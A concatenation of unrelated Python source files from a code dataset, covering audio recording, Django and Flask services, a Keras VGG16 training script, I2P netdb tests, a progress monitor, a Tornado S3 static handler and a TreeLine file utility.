                        # Flush buffer.
                        joined_items = b''.join(item_list)
                        item_list = []
                        wave_file_writer.write(joined_items)
                        # Close.
                        wave_file_writer.close()
                        wave_file_writer = None
                        item_counter = 0
                    #
                    continue
                # Normal case, write frames.
                else:
                    _rec_time, data = item  # "rec_time" not used.
                    # Open file if first after silent part.
                    if not wave_file_writer:
                        wave_file_writer = WaveFileWriter(self)
                    # Check if max rec length was reached.
                    if item_counter >= self._rec_max_length:
                        if wave_file_writer:
                            # Flush buffer.
                            joined_items = b''.join(item_list)
                            item_list = []
                            wave_file_writer.write(joined_items)
                            # Close the old one.
                            wave_file_writer.close()
                            wave_file_writer = None
                            item_counter = 0
                        # Open a new file.
                        wave_file_writer = WaveFileWriter(self)
                    # Append data to buffer
                    item_list.append(data)
                    item_counter += 1
                    # Flush buffer when needed.
                    if len(item_list) >= item_list_max:
                        if wave_file_writer:
                            joined_items = b''.join(item_list)
                            item_list = []
                            wave_file_writer.write(joined_items)
            # Thread terminated: flush and close any open file.
            if wave_file_writer:
                if len(item_list) > 0:
                    # Flush buffer.
                    joined_items = b''.join(item_list)
                    item_list = []
                    wave_file_writer.write(joined_items)
                #
                wave_file_writer.close()
                wave_file_writer = None
            #
        except Exception as e:
            self._logger.error('Recorder: Sound target exception: ' + str(e))
            self._active = False  # Terminate
            if self._callback_function:
                self._callback_function('rec_target_error')
class WaveFileWriter():
    """Each file is connected to a separate object to avoid concurrency problems.

    On construction a new WAV file is opened, named from the target's prefix,
    the current (or GPS) timestamp, the (or GPS) position and the record type,
    e.g. "WURB1_20180420T205942+0200_N00.00E00.00_TE384.wav".
    """
    def __init__(self, sound_target_obj):
        """Open a new mono 16-bit WAV file using settings from *sound_target_obj*."""
        self._wave_file = None
        self._sound_target_obj = sound_target_obj
        self._size_counter = 0
        # Create file name.
        # Default time and position.
        datetimestring = time.strftime("%Y%m%dT%H%M%S%z")
        latlongstring = ''  # Format: 'N56.78E12.34'
        try:
            if sound_target_obj._latitude >= 0:
                latlongstring += 'N'
            else:
                latlongstring += 'S'
            latlongstring += str(abs(sound_target_obj._latitude))
            #
            if sound_target_obj._longitude >= 0:
                latlongstring += 'E'
            else:
                latlongstring += 'W'
            latlongstring += str(abs(sound_target_obj._longitude))
        except Exception:
            # Narrowed from a bare "except:" so system exits are not swallowed.
            latlongstring = 'N00.00E00.00'
        # Use GPS time if available.
        datetime_local_gps = wurb_core.WurbGpsReader().get_time_local_string()
        if datetime_local_gps:
            datetimestring = datetime_local_gps
        # Use GPS position if available.
        latlong = wurb_core.WurbGpsReader().get_latlong_string()
        if latlong:
            latlongstring = latlong
        # Filename example: "WURB1_20180420T205942+0200_N00.00E00.00_TE384.wav"
        filename = sound_target_obj._filename_prefix + \
                   '_' + \
                   datetimestring + \
                   '_' + \
                   latlongstring + \
                   '_' + \
                   sound_target_obj._filename_rec_type + \
                   '.wav'
        filenamepath = os.path.join(sound_target_obj._dir_path, filename)
        #
        if not os.path.exists(sound_target_obj._dir_path):
            os.makedirs(sound_target_obj._dir_path)  # For data, full access.
        # Open wave file for writing.
        self._wave_file = wave.open(filenamepath, 'wb')
        self._wave_file.setnchannels(1)  # 1=Mono.
        self._wave_file.setsampwidth(2)  # 2=16 bits.
        self._wave_file.setframerate(sound_target_obj._out_sampling_rate_hz)
        #
        sound_target_obj._logger.info('Recorder: New sound file: ' + filename)
    def write(self, buffer):
        """Append raw 16-bit frames from *buffer* (bytes) to the file."""
        self._wave_file.writeframes(buffer)
        self._size_counter += len(buffer) / 2  # Count frames (2 bytes each).
    def close(self):
        """Close the file (idempotent) and log its length in seconds."""
        if self._wave_file is not None:
            self._wave_file.close()
            self._wave_file = None
            length_in_sec = self._size_counter / self._sound_target_obj._out_sampling_rate_hz
            self._sound_target_obj._logger.info('Recorder: Sound file closed. Length:' + str(length_in_sec) + ' sec.')
# === TEST ===
# Manual smoke test: configure settings, build the sound manager and record
# for ~5.5 seconds. Assumes it is run from inside the package directory
# (relative "../wurb_settings" path) — TODO confirm working directory.
if __name__ == "__main__":
    """ """
    import sys
    import pathlib
    path = ".."
    sys.path.append(path)
    # Logging to standard output.
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    #
    settings = wurb_core.WurbSettings()
    (desc, default, dev) = wurb_core.wurb_recorder.default_settings()
    settings.set_default_values(desc, default, dev)
    (desc, default, dev) = wurb_core.wurb_gps_reader.default_settings()
    settings.set_default_values(desc, default, dev)
    #
    internal_setting_path = pathlib.Path('../wurb_settings/user_settings.txt')
    settings.load_settings(internal_setting_path)
    #
    recorder = wurb_core.WurbRecorder()
    recorder.setup_sound_manager()
    # Record briefly, then stop.
    print('TEST - started.')
    recorder.start_recording()
    time.sleep(5.5)
    recorder.stop_recording()
    print('TEST - ended.')
| StarcoderdataPython |
11321496 | import os
import io
from flaskr.services.signal_service import signalService
from flaskr.models import db
from flaskr.models.word import Word
class DictionaryService:
    """Builds and persists a plain-text dictionary of words.

    Words come either from the database (``Word`` model) or from an existing
    text file with one word per line.
    """
    @staticmethod
    def get_words_from_db():
        """Return all words stored in the ``Word`` table as a list of strings."""
        query = db.session.query(Word.word).all()
        # Each row is a one-element tuple; take its single value.
        return [row[0] for row in query]
    @staticmethod
    def get_existing_words(path):
        """Read a dictionary file (one word per line) and return the words.

        Uses a context manager so the handle is closed even on error, and
        rstrip('\\n') so a last line without a trailing newline keeps its
        final character (the old ``word[:-1]`` would truncate it).
        """
        with io.open(path, 'r', encoding='utf8') as file:
            return [line.rstrip('\n') for line in file]
    @staticmethod
    def write_txt(words_list, path):
        """Sort *words_list* in place, write one word per line to *path*,
        then emit the 'file_written' signal."""
        words_list.sort()
        with io.open(path, 'w', encoding='utf8') as file:
            for word in words_list:
                file.write(word)
                file.write('\n')
        file_written = signalService.get_signal('file_written')
        file_written.send()
    @staticmethod
    def create_or_update_dictionary():
        """Regenerate "dict.txt" from the words currently in the database."""
        file_name = "dict.txt"
        DictionaryService.write_txt(DictionaryService.get_words_from_db(), file_name)
| StarcoderdataPython |
3539463 | from django.contrib.auth import get_user_model
from rest_framework.fields import CharField
from rest_framework.serializers import ModelSerializer
from grandchallenge.challenges.models import Challenge
from grandchallenge.components.serializers import (
ComponentInterfaceValueSerializer,
)
from grandchallenge.evaluation.models import Evaluation, Phase, Submission
class UserSerializer(ModelSerializer):
    """Serialize a user, exposing only the username."""
    class Meta:
        model = get_user_model()
        fields = ("username",)
class ChallengeSerializer(ModelSerializer):
    """Serialize a challenge's title and short name."""
    class Meta:
        model = Challenge
        fields = ("title", "short_name")
class PhaseSerializer(ModelSerializer):
    """Serialize a phase together with its nested challenge."""
    challenge = ChallengeSerializer()
    class Meta:
        model = Phase
        fields = ("challenge", "title", "slug")
class SubmissionSerializer(ModelSerializer):
    """Serialize a submission with its nested phase and creator."""
    phase = PhaseSerializer()
    creator = UserSerializer()
    class Meta:
        model = Submission
        fields = (
            "pk",
            "phase",
            "created",
            "creator",
            "comment",
            "predictions_file",
            "supplementary_file",
            "supplementary_url",
        )
class EvaluationSerializer(ModelSerializer):
    """Serialize an evaluation with its nested submission and output values."""
    submission = SubmissionSerializer()
    outputs = ComponentInterfaceValueSerializer(many=True)
    # Human-readable status label instead of the stored status code.
    status = CharField(source="get_status_display", read_only=True)
    title = CharField(read_only=True)
    class Meta:
        model = Evaluation
        fields = (
            "pk",
            "method",
            "submission",
            "created",
            "published",
            "outputs",
            "rank",
            "rank_score",
            "rank_per_metric",
            "status",
            "title",
        )
| StarcoderdataPython |
239668 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------------------------
"""
Helpers to process schemas.
"""
from numpy import ndarray
from pandas import DataFrame, Series
from scipy.sparse import csr_matrix
from .data_roles import Role
from .data_schema import COL
from .data_stream import ViewDataStream, ViewBasePipelineItem
def _extract_label_column(learner, schema_y=None):
if schema_y is not None:
label_column = schema_y[0].Name
elif learner.label_column is not None:
label_column = learner.label_column
else:
label_column = Role.Label
return label_column
def _extract_columns(columns, side, none_allowed):
if columns is None:
if none_allowed:
return None
raise ValueError(
"'None' {0} passed when it cannot be none.".format(side))
if isinstance(columns, Series):
columns = [columns.name]
elif isinstance(columns, DataFrame):
columns = [_ for _ in columns.columns]
elif isinstance(columns, str):
columns = [columns]
elif isinstance(columns, (ViewDataStream, ViewBasePipelineItem)):
columns = columns.columns
elif isinstance(columns, ndarray):
# columns.flags['OWNDATA']
raise ValueError(
"There is not easy way to retrieve the original columns "
"from a numpy view. Use COL.")
elif isinstance(columns, csr_matrix):
# columns.flags['OWNDATA']
raise ValueError(
"There is not easy way to retrieve the original columns from a "
"csr_matrix view. Use COL.")
elif isinstance(columns, COL):
if side == 'input':
columns = columns.get_in()
elif side == 'output':
columns = columns.get_out()
else:
raise ValueError(
"side must be 'input' our 'output' not '{0}'".format(side))
if not isinstance(columns, list):
raise ValueError(
"{0} has to be a list of strings, instead got {1}".format(
side, type(columns)))
return columns
| StarcoderdataPython |
1646558 | # collector package
| StarcoderdataPython |
1615314 |
# Data Plotting
import matplotlib.pyplot as plt
# Deep learning
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping
def main():
    """Build and train a VGG16-style CNN on the 'train'/'validation' folders,
    then plot accuracy/loss curves.

    Fixes: history keys are 'accuracy'/'val_accuracy' (matching
    metrics=['accuracy'] and the monitored 'val_accuracy'); the old
    'acc'/'val_acc' keys raised KeyError. Adam's deprecated ``lr`` argument
    is replaced by ``learning_rate``.
    """
    trainer_data = ImageDataGenerator()
    train_data = trainer_data.flow_from_directory(directory="train", target_size=(224, 224))
    validator_data = ImageDataGenerator()
    validation_data = validator_data.flow_from_directory(directory="validation", target_size=(224, 224))
    '''
    agg16 neural network architecture:
    1.Convolution using 64 filters
    2.Convolution using 64 filters + Max pooling
    3.Convolution using 128 filters
    4. Convolution using 128 filters + Max pooling
    5. Convolution using 256 filters
    6. Convolution using 256 filters
    7. Convolution using 256 filters + Max pooling
    8. Convolution using 512 filters
    9. Convolution using 512 filters
    10. Convolution using 512 filters+Max pooling
    11. Convolution using 512 filters
    12. Convolution using 512 filters
    13. Convolution using 512 filters+Max pooling
    14. Fully connected with 4096 nodes
    15. Fully connected with 4096 nodes
    16. Output layer with Softmax activation with required nodes (originally a 1000).
    '''
    model = keras.Sequential()
    # 1
    model.add(
        layers.Conv2D(filters=64, kernel_size=[3, 3], activation='relu', padding='same', input_shape=(224, 224, 3)))
    # 2
    model.add(layers.Conv2D(filters=64, kernel_size=[3, 3], activation='relu', padding='same'))
    model.add(layers.MaxPool2D(pool_size=(2, 2)))
    # 3
    model.add(layers.Conv2D(filters=128, kernel_size=[3, 3], activation='relu', padding='same'))
    # 4
    model.add(layers.Conv2D(filters=128, kernel_size=[3, 3], activation='relu', padding='same'))
    model.add(layers.MaxPool2D(pool_size=(2, 2)))
    # 5
    model.add(layers.Conv2D(filters=256, kernel_size=[3, 3], activation='relu', padding='same'))
    # 6
    model.add(layers.Conv2D(filters=256, kernel_size=[3, 3], activation='relu', padding='same'))
    # 7
    model.add(layers.Conv2D(filters=256, kernel_size=[3, 3], activation='relu', padding='same'))
    model.add(layers.MaxPool2D(pool_size=(2, 2)))
    # 8
    model.add(layers.Conv2D(filters=512, kernel_size=[3, 3], activation='relu', padding='same'))
    # 9
    model.add(layers.Conv2D(filters=512, kernel_size=[3, 3], activation='relu', padding='same'))
    # 10
    model.add(layers.Conv2D(filters=512, kernel_size=[3, 3], activation='relu', padding='same'))
    model.add(layers.MaxPool2D(pool_size=(2, 2)))
    # 11
    model.add(layers.Conv2D(filters=512, kernel_size=[3, 3], activation='relu', padding='same'))
    # 12
    model.add(layers.Conv2D(filters=512, kernel_size=[3, 3], activation='relu', padding='same'))
    # 13
    model.add(layers.Conv2D(filters=512, kernel_size=[3, 3], activation='relu', padding='same'))
    model.add(layers.MaxPool2D(pool_size=(2, 2)))
    # 14
    model.add(layers.Flatten())
    model.add(layers.Dense(units=4096, activation='relu'))
    model.add(layers.Dense(units=4096, activation='relu'))
    model.add(layers.Dense(units=2, activation='softmax'))
    model.build()
    model.summary()
    learning_rate = 0.001
    model.compile(
        optimizer=keras.optimizers.Adam(learning_rate=learning_rate),
        loss=keras.losses.categorical_crossentropy,
        metrics=['accuracy']
    )
    # The model will only be saved to disk if the validation accuracy of the model in current epoch is greater than
    # what it was in the last epoch.
    # NOTE(review): save_freq=1 means "every batch", not "every epoch" — confirm intent.
    checkpoint = ModelCheckpoint("vgg16_1.h5", monitor='val_accuracy', verbose=2, save_best_only=True,
                                 save_weights_only=False, mode='auto', save_freq=1)
    early = EarlyStopping(monitor='val_accuracy', min_delta=0, patience=20, verbose=1, mode='auto')
    hist = model.fit(x=train_data, steps_per_epoch=len(train_data), validation_data=validation_data,
                     validation_steps=len(validation_data), epochs=5, verbose=2, callbacks=[checkpoint, early])
    # History keys follow the metric name 'accuracy' (not the old 'acc').
    plt.plot(hist.history["accuracy"])
    plt.plot(hist.history['val_accuracy'])
    plt.plot(hist.history['loss'])
    plt.plot(hist.history['val_loss'])
    plt.title("model accuracy")
    plt.ylabel("Accuracy")
    plt.xlabel("Epoch")
    plt.legend(["Accuracy", "Validation Accuracy", "loss", "Validation Loss"])
    plt.show()
# Script entry point: run training when executed directly.
if __name__ == '__main__':
    main()
| StarcoderdataPython |
5063683 | <gh_stars>0
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from bookstore.apps.catalog.views import (
BookListView,
BookDetailView,
AuthorListView,
AuthorDetailView,
PublishingCompanyListView,
)
# Application namespace used by reverse()/{% url %} lookups ("catalog:...").
app_name = "catalog"
# Catalog routes: list/detail views for books and authors, plus the
# publishing-company list. Detail views are addressed by slug.
urlpatterns = [
    path(
        "books/",
        BookListView.as_view(),
        name="book-list"
    ),
    path(
        "book/<slug:slug>/",
        BookDetailView.as_view(),
        name="book-detail"
    ),
    path(
        "authors/",
        AuthorListView.as_view(),
        name="author-list"
    ),
    path(
        "author/<slug:slug>/",
        AuthorDetailView.as_view(),
        name="author-detail"
    ),
    path(
        "publishingcompanies/",
        PublishingCompanyListView.as_view(),
        name="publishing-list",
    ),
]
# Serve collected static files through Django (helper is a no-op when a
# dedicated web server handles them).
urlpatterns += staticfiles_urlpatterns()
# In development only, also serve user-uploaded media from MEDIA_ROOT.
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| StarcoderdataPython |
1824852 | <filename>tests/test_base.py
# coding=utf-8
import os
import sys
import unittest
dirname = os.path.dirname(os.path.abspath(__file__))
project = os.path.dirname(dirname)
if project not in sys.path:
sys.path.insert(0, project)
class BaseTestCase(unittest.TestCase):
    """Project-wide base class for test cases."""
    @staticmethod
    def main():
        """Run the calling module's tests, stopping at the first failure."""
        return unittest.main(failfast=True)
| StarcoderdataPython |
11269214 | <filename>utils/monitor.py
from datetime import datetime
class Monitor:
    """In-place console progress bar with ETA / elapsed-time display."""

    def __init__(self):
        # Timestamp of the first output() call; reset once a run completes.
        self.last_time = None

    def output(self, current_state, total_state, extra=None):
        """Render one progress line (carriage-return update, no newline).

        current_state -- work done so far (clamped to at least 1 for the
                         ETA math and the displayed counter).
        total_state   -- total amount of work.
        extra         -- optional object appended to the line; braces and
                         quotes in its repr are normalized to parentheses.
        """
        if self.last_time is None:
            self.last_time = datetime.now()
        percent = int(current_state / total_state * 100)
        # 20-segment bar: one '█' per started 5% tick.
        bar = "|" + "".join("█" if percent >= tick else " " for tick in range(0, 100, 5)) + "|"
        done = max(current_state, 1)
        elapsed = (datetime.now() - self.last_time).total_seconds()
        remaining = int(elapsed * (total_state - done) / done)
        line = bar
        line += " " * (3 - len(str(percent))) + str(percent) + "% ("
        line += " " * (len(str(total_state)) - len(str(done))) + str(done) + "/" + str(total_state)
        if done != total_state:
            minute, second = divmod(remaining, 60)
            hour, minute = divmod(minute, 60)
            line += ") wait " + "%04d:%02d:%02d" % (hour, minute, second)
        else:
            minute, second = divmod(elapsed, 60)
            hour, minute = divmod(minute, 60)
            line += ") used " + "%04d:%02d:%02d" % (hour, minute, second)
        if extra is not None:
            line += " " + str(extra).replace("\'", "").replace("{", "(").replace("}", ")") + "."
        else:
            line += "."
        print("\r" + line, end="", flush=True)
        if done == total_state:
            self.last_time = None
            print()
| StarcoderdataPython |
6647657 | from django import forms
from .models import Loan
from books.models import Book
class LoanForm(forms.ModelForm):
    """Form for creating a Loan, with the book identified by a typed code."""
    # Free-text book code; not a Loan model field, so presumably resolved to
    # a Book instance in the view — TODO confirm against the caller.
    code = forms.CharField(label='Book Code')
    class Meta:
        model = Loan
        fields = [
            'to',
        ]
| StarcoderdataPython |
1965214 | <gh_stars>1-10
import pandas as pd
import numpy as np
import os, sys, json
import warnings
warnings.filterwarnings("ignore")
from .utils import *
from .metadata import get_task2category, bm_metric_names, benchmark_names, bm_split_names
from .evaluator import Evaluator
class BenchmarkGroup:
    """Iterable collection of benchmark datasets with standard splits and metrics.

    Usage::

        group = BenchmarkGroup(name='ADMET_Group', path='data/')
        predictions = {}
        for benchmark in group:
            name = benchmark['name']
            train, valid, test = benchmark['train'], benchmark['valid'], benchmark['test']
            # --- train your model --- #
            predictions[name] = y_pred
        group.evaluate(predictions)
        # {'caco2_wang': {...}, 'hia_hou': {...}}

    On disk each dataset lives under ``<path>/<group>/<dataset>/`` as
    train.csv / valid.csv / test.csv.
    """
    def __init__(self, name, path='./data'):
        """Load group metadata and flatten the task -> datasets mapping."""
        self.name = bm_group_load(name, path)
        self.path = os.path.join(path, self.name)
        self.datasets = benchmark_names[self.name]
        self.dataset_names = []
        for task, datasets in self.datasets.items():
            for dataset in datasets:
                self.dataset_names.append(dataset)
    def __iter__(self):
        """Start iteration over all datasets in the group."""
        self.index = 0
        self.num_datasets = len(self.dataset_names)
        return self
    def __next__(self):
        """Yield the next dataset as {'train', 'valid', 'test', 'name'}."""
        if self.index < self.num_datasets:
            dataset = self.dataset_names[self.index]
            print_sys('--- ' + dataset + ' ---')
            data_path = os.path.join(self.path, dataset)
            train = pd.read_csv(os.path.join(data_path, 'train.csv'))
            valid = pd.read_csv(os.path.join(data_path, 'valid.csv'))
            test = pd.read_csv(os.path.join(data_path, 'test.csv'))
            self.index += 1
            return {'train': train, 'valid': valid, 'test': test, 'name': dataset}
        else:
            raise StopIteration
    def get_auxiliary_train_valid_split(self, seed, benchmark):
        """Re-split train+valid (87.5/12.5) using the dataset's split type."""
        dataset = fuzzy_search(benchmark, self.dataset_names)
        data_path = os.path.join(self.path, dataset)
        train = pd.read_csv(os.path.join(data_path, 'train.csv'))
        valid = pd.read_csv(os.path.join(data_path, 'valid.csv'))
        train_val = pd.concat([train, valid]).reset_index(drop=True)
        if bm_split_names[self.name][dataset] == 'scaffold':
            out = create_scaffold_split(train_val, seed, frac=[0.875, 0.125, 0], entity='Drug')
        elif bm_split_names[self.name][dataset] == 'random':
            out = create_fold(train_val, seed, frac=[0.875, 0.125, 0])
        else:
            raise NotImplementedError
        return out
    def get(self, benchmark):
        """Return one dataset's splits by (fuzzy-matched) name."""
        dataset = fuzzy_search(benchmark, self.dataset_names)
        data_path = os.path.join(self.path, dataset)
        train = pd.read_csv(os.path.join(data_path, 'train.csv'))
        valid = pd.read_csv(os.path.join(data_path, 'valid.csv'))
        test = pd.read_csv(os.path.join(data_path, 'test.csv'))
        return {'train': train, 'valid': valid, 'test': test, 'name': dataset}
    def evaluate(self, pred, true=None, benchmark=None):
        """Score predictions with each dataset's standard metric.

        With ``true`` omitted, *pred* maps dataset name -> predictions and
        is scored against the stored test labels. With ``true`` given,
        *pred*/*true* are scored directly for the named *benchmark*.
        """
        if true is None:
            # Test set evaluation.
            metric_dict = bm_metric_names[self.name]
            out = {}
            for data_name, pred_ in pred.items():
                data_name = fuzzy_search(data_name, self.dataset_names)
                data_path = os.path.join(self.path, data_name)
                test = pd.read_csv(os.path.join(data_path, 'test.csv'))
                y = test.Y.values
                # Construct the evaluator directly; the previous eval() on a
                # built source string was fragile and unsafe.
                evaluator = Evaluator(name=metric_dict[data_name])
                out[data_name] = {metric_dict[data_name]: round(evaluator(y, pred_), 3)}
            return out
        else:
            # Validation set evaluation.
            if benchmark is None:
                raise ValueError('Please specify the benchmark name for us to retrieve the standard metric!')
            data_name = fuzzy_search(benchmark, self.dataset_names)
            metric_dict = bm_metric_names[self.name]
            evaluator = Evaluator(name=metric_dict[data_name])
            return {metric_dict[data_name]: round(evaluator(true, pred), 3)}
| StarcoderdataPython |
6510254 | <reponame>gray0018/Normal-integration-benchmark
import OpenEXR
import Imath
import sys
import scipy.io as io
import numpy as np
import cv2
from matplotlib import pyplot as plt
def split_channel(f, channel, float_flag=True):
    """Extract one channel from an opened EXR file as a 2-D numpy array.

    f          -- OpenEXR.InputFile instance.
    channel    -- channel name, e.g. 'normal.R'.
    float_flag -- True to read 32-bit floats, False for 16-bit halfs.
    """
    dw = f.header()['dataWindow']
    size = (dw.max.x - dw.min.x + 1, dw.max.y - dw.min.y + 1)
    if float_flag:
        pt = Imath.PixelType(Imath.PixelType.FLOAT)
        dtype = np.float32
    else:
        pt = Imath.PixelType(Imath.PixelType.HALF)
        # HALF pixels are 16-bit; decoding them as float32 (as the old code
        # did) misinterprets the buffer and halves the pixel count.
        dtype = np.float16
    channel_str = f.channel(channel, pt)
    img = np.frombuffer(channel_str, dtype=dtype)
    # Rows = height (y extent), columns = width (x extent).
    return img.reshape(size[1], size[0])
def main(exr_name, output_name, output_format):
    """Read normal/position channels from an EXR file, save them, and plot.

    exr_name      -- input .exr path.
    output_name   -- prefix for '<name>_normal.*' and '<name>_depth.*'.
    output_format -- 'npy' for numpy files; anything else writes .mat files.
    """
    f = OpenEXR.InputFile(exr_name)
    channels = dict()
    for channel_name in f.header()["channels"]:
        print(channel_name)
        # (The old code called split_channel twice per channel, discarding
        # the first result.)
        channels[channel_name] = split_channel(f, channel_name)
    # Stack R/G/B normal channels into an (H, W, 3) array; depth comes from
    # the blue component of the position pass.
    normal = np.concatenate((channels["normal.R"][:, :, None], channels["normal.G"][:, :, None], channels["normal.B"][:, :, None]), axis=-1)
    depth = np.array(channels["position.B"])
    if output_format == "npy":
        np.save("{0}_normal.npy".format(output_name), normal)
        np.save("{0}_depth.npy".format(output_name), depth)
    else:
        io.savemat('{0}_normal.mat'.format(output_name), {'est_normal': normal})
        io.savemat('{0}_depth.mat'.format(output_name), {'est_depth': depth})
    # Side-by-side preview: normals remapped from [-1, 1] to [0, 1], depth in gray.
    fig1 = plt.subplot(1, 2, 1)
    fig1 = plt.imshow(normal/2+.5)
    fig1.axes.get_xaxis().set_visible(False)
    fig1.axes.get_yaxis().set_visible(False)
    fig2 = plt.subplot(1, 2, 2)
    fig2 = plt.imshow(depth, "gray")
    fig2.axes.get_xaxis().set_visible(False)
    fig2.axes.get_yaxis().set_visible(False)
    plt.show()
# Script entry point. Show usage when asked for help OR when too few
# arguments are given (the old code raised IndexError with no arguments).
if __name__ == "__main__":
    if len(sys.argv) < 4 or sys.argv[1] == "--help":
        print("usage: python exr-read.py input-exr outputname npy(or mat)")
    else:
        main(sys.argv[1], sys.argv[2], sys.argv[3])
| StarcoderdataPython |
9631950 | # pylint: disable=attribute-defined-outside-init
""" Proxy S3 as static file handler """
import logging
from tornado.web import StaticFileHandler
from .access_control import UserMixin
LOGGER = logging.getLogger(__name__)
class StaticFiles(UserMixin, StaticFileHandler): # pylint: disable=W0223
    """Serve S3-backed content through Tornado's StaticFileHandler.

    Work-around: the classmethod hooks (get_content) have no access to the
    request, so a per-request "site" object resolved in
    validate_absolute_path() is cached in the class-level ``sites`` dict
    keyed by absolute path and dropped again in finish().
    """
    # abspath -> site object cache.
    # NOTE(review): class-level shared state — appears to assume one request
    # per abspath at a time; confirm behavior under concurrent requests.
    sites = {}
    @classmethod
    def get_content(cls, abspath, start=None, end=None):
        """Return the content for *abspath* (start/end range args are ignored)."""
        LOGGER.info("get abs: %r", abspath)
        site = cls.sites[abspath]
        _, data = site.get_file(abspath)
        return data
    def _stat(self):
        """Return (and cache per request) HEAD metadata for the current path."""
        assert self.absolute_path is not None
        abspath = self.absolute_path
        LOGGER.info("static abs: %r %r", self.root, self.absolute_path)
        if not hasattr(self, "_stat_result"):
            result = self.site.get_head(abspath)
            self._stat_result = result # pylint: disable=W0201
        return self._stat_result
    @classmethod
    def get_absolute_path(cls, root, path):
        """Return the "absolute" path of the content; here the path itself."""
        LOGGER.info("make abs: %r %r", root, path)
        # root's trailing slash is stripped but root is otherwise unused here.
        root = root[:-1] if root[-1] == "/" else root
        return path
    def validate_absolute_path(self, root, absolute_path):
        """Resolve the site for this request and cache it under the abspath."""
        LOGGER.info("validate abs: %r %r", root, absolute_path)
        static_prefix = self.settings["static_prefix"]
        current_user = self.get_current_user()
        self.site = self.application.get_site(
            current_user, absolute_path, self.request
        )
        abspath = f"{static_prefix}{absolute_path}"
        self.sites[abspath] = self.site
        LOGGER.info("site set: %r", abspath)
        return abspath
    def finish(self, chunk=None):
        """Finish the response and drop the cached site for this path."""
        result = super().finish(chunk)
        self.site = None
        if self.absolute_path:
            del self.sites[self.absolute_path]
        return result
| StarcoderdataPython |
6643489 | <gh_stars>10-100
# test_netdb.py - Test netdb.py
# Author: <NAME> <<EMAIL>>
# License: MIT
# Note: this uses py.test.
import netdb,os,random
'''
def test_inspect():
netdb.inspect()
'''
def test_sha256():
    # Known-answer test: raw=False must return the hex digest string.
    assert('d2f4e10adac32aeb600c2f57ba2bac1019a5c76baa65042714ed2678844320d0' == netdb.netdb.sha256('i2p is cool', raw=False))
def test_address_valid():
    # A default-constructed Address is invalid; one with transport, options,
    # expire and firewalled set must report valid.
    invalid = netdb.netdb.Address()
    valid = netdb.netdb.Address()
    valid.cost = 10
    valid.transport = 'SSU'
    valid.options = {'host': '0.0.0.0', 'port': '1234', 'key': '', 'caps': ''}
    valid.expire = 0
    valid.firewalled = False
    assert(valid.valid() and not invalid.valid())
def test_address_repr():
    # repr() of a fully populated Address must match the exact expected string
    # (this pins the dict insertion order of options on Python 3.7+).
    valid = netdb.netdb.Address()
    valid.cost = 10
    valid.transport = 'SSU'
    valid.options = {'host': '0.0.0.0', 'port': '1234', 'key': '', 'caps': ''}
    valid.expire = 0
    valid.firewalled = False
    assert(repr(valid) == 'Address: transport=SSU cost=10 expire=0 options={\'host\': \'0.0.0.0\', \'port\': \'1234\', \'key\': \'\', \'caps\': \'\'} location=None firewalled=False')
# TODO: test_entry*
# Placeholder tests: each only asserts True, recording the intended coverage
# points until real Entry tests are written.
# NOTE(review): test_entry_read_short is defined twice; the second definition
# shadows the first (harmless here since both are identical stubs).
def test_entry_read_short():
    assert(True)
def test_entry_read_mapping():
    assert(True)
def test_entry_read():
    assert(True)
def test_entry_read_short():
    assert(True)
def test_entry_read_byte():
    assert(True)
def test_entry_read_string():
    assert(True)
def test_entry_init():
    assert(True)
def test_entry_load():
    assert(True)
def test_entry_verify():
    assert(True)
def test_entry_repr():
    assert(True)
def test_entry_dict():
    assert(True)
# Make some garbage files and hope they break things.
def test_fuzz():
    """Write random junk .dat files and check that netdb.inspect() survives them.

    Both the write and the inspect now use the same directory; the old code
    wrote to $PWD/tests/fuzzdb but inspected $PWD/fuzzdb.
    """
    pwd = os.environ['PWD']
    fuzz_dir = '{}/tests/fuzzdb'.format(pwd)
    for i in range(1, 100):
        with open('{}/{}.dat'.format(fuzz_dir, i), 'wb') as fout:
            fout.write(os.urandom(random.randint(2, 400)))  # replace with size_kb if not unreasonably large
    # Now let's inspect the garbage.
    netdb.inspect(netdb_dir='{}/'.format(fuzz_dir))
| StarcoderdataPython |
20041 | <reponame>Infinidat/infi.gevent-utils
from __future__ import absolute_import
from infi.gevent_utils.os import path
import sys
import os
sys.path.append(os.path.dirname(__file__))
from utils import GreenletCalledValidatorTestCase
class PathTestCase(GreenletCalledValidatorTestCase):
    """Check gevent-friendly ``path`` wrappers against the switch validator.

    The validator presumably counts greenlet switches: blocking filesystem
    calls should switch exactly once, pure string work not at all — TODO
    confirm against GreenletCalledValidatorTestCase.
    """
    def test_exists(self):
        # exists() hits the filesystem, so one switch is expected.
        self.switch_validator.assert_called(0)
        self.assertFalse(path.exists("/this_path_probably_doesnt_exist_or_else_the_test_will_fail"))
        self.switch_validator.assert_called(1)
    def test_basename(self):
        # basename() is pure string manipulation: no switch expected.
        self.switch_validator.assert_called(0)
        self.assertEqual("a.text", path.basename("/a/b/c/a.text"))
        self.switch_validator.assert_called(0)
| StarcoderdataPython |
9755759 | <filename>inject/treeline.py
"""treeline.py -- utility functions for working with .trln files
read(path) -- read a .trln file
new(path) -- create a blank, new .trln file
save() -- save the .trln file
g[PATH] -- path of file, used when writing
g[CONTENT] -- the raw JSON content of the .trln file
Indexed fields:
.clear() -- clear indexed fields
.scan() -- (re-)scan .content to populate indexed fields
g[FORMATS] -- the raw formats content of the trln file
g[NODES] -- the raw nodes content of the trln file
g[PROPERTIES] -- the raw properties content of the trln file
g[CHILDREN] -- map from node UID -> children
g[DATA] -- map from node UID -> raw data for the node
g[FORMAT] -- map from node UID -> string name of format for the node
g[TLVERSION] -- version string from .properties
g[TOPNODES] -- list of node UIDs for top-level nodes
"""
import random
import json
import copy
#region Structure Constants
JSON_FORMATS = "formats"
JSON_FORMATNAME = "formatname"
JSON_ICON = "icon"
JSON_OUTPUTLINES = "outputlines"
JSON_TITLELINE = "titleline"
JSON_FIELDS = "fields"
JSON_FIELDNAME = "fieldname"
JSON_FIELDTYPE = "fieldtype"
JSON_LINES = "lines"
